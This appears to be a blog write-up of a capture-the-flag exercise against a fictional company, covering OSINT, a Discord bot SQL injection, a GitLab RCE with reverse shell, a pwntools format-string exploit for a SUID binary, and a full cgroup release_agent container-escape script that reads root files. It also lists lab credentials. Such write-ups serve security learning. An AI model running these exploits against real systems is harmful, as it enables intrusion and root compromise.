Bugv CTF Writeup - Pwning Thawang Shield

-
The CTF is designed to pwn an imaginary organization Thawang Shield Security. The only information given to us is their domain - thawang.live

Starting with the domain thawang.live, usual recon - directory bruteforcing, port scanning,  subdomain enumeration, etc. was done. It didn't give much information to proceed ahead so I started some OSINT on the org.

Looking at the "Teams" section of the website thawang.live, we can find three users.


Flag #1

Checking the Facebook profile of Ojasini Shrees, a picture was found which we downloaded, checked its strings and the first flag was obtained. bugv_ctf{MjVFRXNDNWJWeVBBRW}



Flag #2

After obtaining flag #1, there's also a link to the discord server https://discord.gg/JwXD7g2f5a. The discord server has a bot that is vulnerable to simple SQL injection. Using the payload $get 1'or 1=1-- as an input for the bot, the flag is returned. bugv_ctf{M0Tlo1MkNBcWRwR1ND}



Flag #3

While checking Github of Dexa Singh, a repo "for intern" was found https://github.com/dexasingh/For-Intern. This repo contains an OpenVPN config file. The config had an IP 18.142.23.79. After scanning full ports 0-65535, port 1080 was found to be running a GitLab instance with a vulnerable version.




Exploit for the vuln GitLab can be found at https://github.com/ctrlsam/GitLab-11.4.7-RCE
After running the exploit, the reverse shell is returned to our attacking machine.




The flag can be found in /var/opt/gitlab/note3.txt
bugv_ctf{SDY5UjlXTmJ3NVdwdT}

Flag #4

In the same GitHub repo of Dexa Singh, there is an android apk file called bugvctf.apk. Decompiling the apk file with jadx and viewing mainactivity.java file, we can obtain 4th flag bugv_ctf{RlZlRVaXFGenppWG9u}


Flag #5

In the above mainactivity.java file, we can also obtain credentials for kakashi user as kakashi:k4mu1_r41k1r1



Using the same password, we can log in as kakashi in the above gitlab machine. In /home/kakashi, a SUID binary was found which was vulnerable to format string attack.


The binary was analysed with ghidra and while checking its functions, we saw an interesting function named binshell() which is spawning a shell.

Now, moving to the main function and checking its source code, we noticed that on line 29, it prints out our input without using any format strings. So, it's clear that it is vulnerable to format strings vuln.


After gathering all the required addresses, we used a simple redirection using format string to gain root shell. Below is the exploit we crafted to redirect the flow of the program and pop the root shell.

(Shoutout to my teammates 0x4vian and maskop9 for the exploit)

from pwn import *

p = process('./malicious')

offset = 4

bin = 0x0804934f
exit = 0x804c02c
low = bin &0xFFFF
high = high = bin>>16

output = p32(exit)
output += p32(exit +2)
output += p32(bin)
output += "%"+str((low-len(output))&0xFFFF) + "u%"+str(offset)+"$hn"
output += "%"+str((high-low)&0xFFFF) + "u%"+str(offset+1)+"$hn"

print(output)

p.recvline()
p.recvline()
p.recvline()
p.recvline()
test = p.recvline()
print(test)
p.sendline("yes")
ok= p.recvline()
print(ok)
p.sendline(output)
p.interactive()
p.recvline()

5th flag is in /root directory bugv_ctf{dWZkdUFXaXJTY1pwY1}



Flag #6

While doing OSINT on Ojasini shrees, we came across her Twitter profile too. https://twitter.com/ojasini_shrees
There are 100+ tweets with random hex. Scraping all those tweets, arranging the hex in order, and reverting with xxd, we obtain a png file with a QR code.



Decoding the QR code, we obtain 6th flag bugv_ctf{NpZ2RiaWtKWnRROW1Z} and an IP 13.251.13.169


Flag #7

Dexa’s github also has a pcap file at https://github.com/dexasingh/For-Intern/blob/main/Files/traffic.pcapng
Viewing the pcap file with wireshark and exporting the objects, we can obtain flag.txt bugv_ctf{Y3JLMTFqbzJtYlhVRV} and credentials escapegod:y0un33d23sc4p3


Flag #8

Using the above credentials, we can SSH as escapegod in 13.251.13.169 and port 2991. We can also use the same password to log in to container 172.17.0.2 as the root user. By abusing the control groups release_agent feature, we can escape the container to execute arbitrary commands as root user in the host machine.

Run the below exploit to read the 8th flag:


#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
cat /root/*.txt > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
  if [ $((${TPID} % 100)) -eq 0 ]
  then
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
    then
      echo "Exiting at ${MAX_PID} :-("
      exit 1
    fi
  fi
  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
  TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}
Ref: https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html



Flag #9

Now combining all above-obtained flags, we get MjVFRXNDNWJWeVBBRWM0Tlo1MkNBcWRwR1NDSDY5UjlXTmJ3NVdwdTRlZlRVaXFGenppWG9udWZkdUFXaXJTY1pwY1NpZ2RiaWtKWnRROW1ZY3JLMTFqbzJtYlhVRVVEb0NVOWcyeXJQRGhyak4K=

Running ciphey tool (https://github.com/Ciphey/Ciphey), above encrypted text can be decoded as bugv_ctf{f1n4lly_y0u_h4v3_3sc4p3d_fr0m_0ur_m4z3_4nd_0wn_th4w4ng_sh13ld_s3cur1ty} which is our final flag and sums up the CTF.

Comments

Post a Comment

Popular posts from this blog

Adventures Into The MeowCorp Bug Bounty Program

-
Image
Introduction After hacking into a private program for a while now, I found some nice bugs, mostly through recon and chaining one clue after another. In this blog post, I'll discuss the same as well as my approach to finding them. Since I've signed an NDA with them, all references to the project and company are redacted. For the sake of this blog, I am going to refer to the project as MeowCorp project and their primary domain as meowcorp.io.  Findings #1 /.git/config file to root shell After running regular subdomain enumeration tools, I picked up some interesting subdomains. One of them was api.scan.meowcorp.io. While performing content discovery on this subdomain, I found  git config file. Quickly I dumped the files from .git dir with GitTools  but it was all static CSS, JS files that were of no use. When I was about to close the terminal tab, I noticed that the git repo belonged to a personal GitHub profile.  The company has its own GitHub org profile but the reference to a p
Read more

Expanding the attack surface with Shodan's lesser known filter

-
Image
I have been using Shodan extensively for bug bounty hunting lately and I found some neat tricks to expand the attack surface of the given target. There are many blogs and tutorials on "Shodan Recon" and most of them talk about the same filters - ssl, ssl.cert.subject.cn, org, ip, hostname, etc. but I have not seen anyone talk about this filter - all. So, I won't talk much about the basics of shodan and directly jump to the topic.  Shodan's regular search bar (without any filter) is not consistent and when you search for a keyword, it only looks for the "keyword" in https://www.shodan.io/host/<ip> BUT shodan's raw data (https://www.shodan.io/host/<ip>/raw) contains much more information or what I like to call it as "references" about the target. To find those references and juicy hosts, this "all" filter is very handy. I have been using this filter a lot and it has found many hosts that no other filter could find. The usage
Read more

Dropping root shell in a Crypto Exchange for Fun (and Profit?)

-
Image
I have been using this Crypto Exchange - changenow.io for at least a year now. I didn't realize they also had a bug bounty program which was mentioned in their footer section. I was quite busy with my day job so I kept the details of the program in my todo.txt so I could check it out later. One night when I was having that itch of doing some bug bounties, I checked my todo.txt and decided to hunt bugs on changenow.io. I started by enumerating subdomains and probing for standard web ports (80/443). After obtaining a handful of URLs, I tried to visit them one by one and noticed a few of them were trying to redirect to another internal domain eth-btc.com A quick whois on eth-btc.com revealed that it also belonged to changenow.io (admin email - sysadmin@changenow.io) so I enumerated the subdomains of this domain too. One of the subdomain zbx.sup.eth-btc.com was running Zabbix instance. I didn't have login credentials and common creds also didn't work but there was "Sign i
Read more